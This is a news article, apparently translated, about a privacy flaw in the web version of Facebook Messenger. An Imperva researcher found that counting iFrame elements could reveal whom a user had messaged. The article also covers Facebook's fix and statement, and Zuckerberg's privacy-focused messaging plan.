A vulnerability affecting the web version of Facebook Messenger may have revealed the identity of the people with whom you discussed on this platform.
Ron Masas, a researcher at Imperva Security, discovered the flaw and reported it privately to Facebook. The social network has already implemented a fix.
"I started rummaging through the Messenger web application and noticed that the iFrame elements dominated the user interface," Masas wrote in an article published Thursday on his blog. "I decided to gradually save the iFrame count data for as many terminals as I could find, in order to discover interesting and detectable states."
He noticed an interesting trend:
"When the current user has not been in contact with a specific user, the number of iFrame would reach three, then would always drop sharply for a few milliseconds," Masas explained. "That could leave [an attacker] remotely check if the current user has discussed with a specific person or company, which would violate the privacy of those users. "
An attacker could have exploited the bug simply by persuading a Messenger user to visit a malicious site, then have it click anywhere on the page, for example by tapping on a nice video of cat.
To fix the bug, Facebook has removed all the iFrames from the Messenger UI, writes Masas.
In a statement Friday at PCMag, Facebook said that it was technically not a messenger bug.
"The bug is a browser issue related to how they handle content embedded in web pages, and could affect any site, not just Messenger.com," said a Facebook spokesman. "We had already solved the problem of Messenger.com last year in order to protect our users and made recommendations to browser vendors to avoid this type of problem."
The revelations about the bug come after Mark Zuckerberg, CEO of Facebook, presented earlier this week a new plan to create a platform of messaging and social networking "confidentiality". The idea may seem laughable to those who have followed the many recent privacy scandals, but Zuckerberg is said to be ready to prove that those who doubted were mistaken.
"I understand that many people think that Facebook can not and does not want to create this type of privacy-focused platform because we do not have the current reputation for creating protection services. confidentiality, tools for more open sharing, "he wrote. "But we have shown time and again that we can evolve to create the services that people really want, including in private messaging and stories."
Editor's Note: This story was updated at 15:30. AND with the Facebook statement.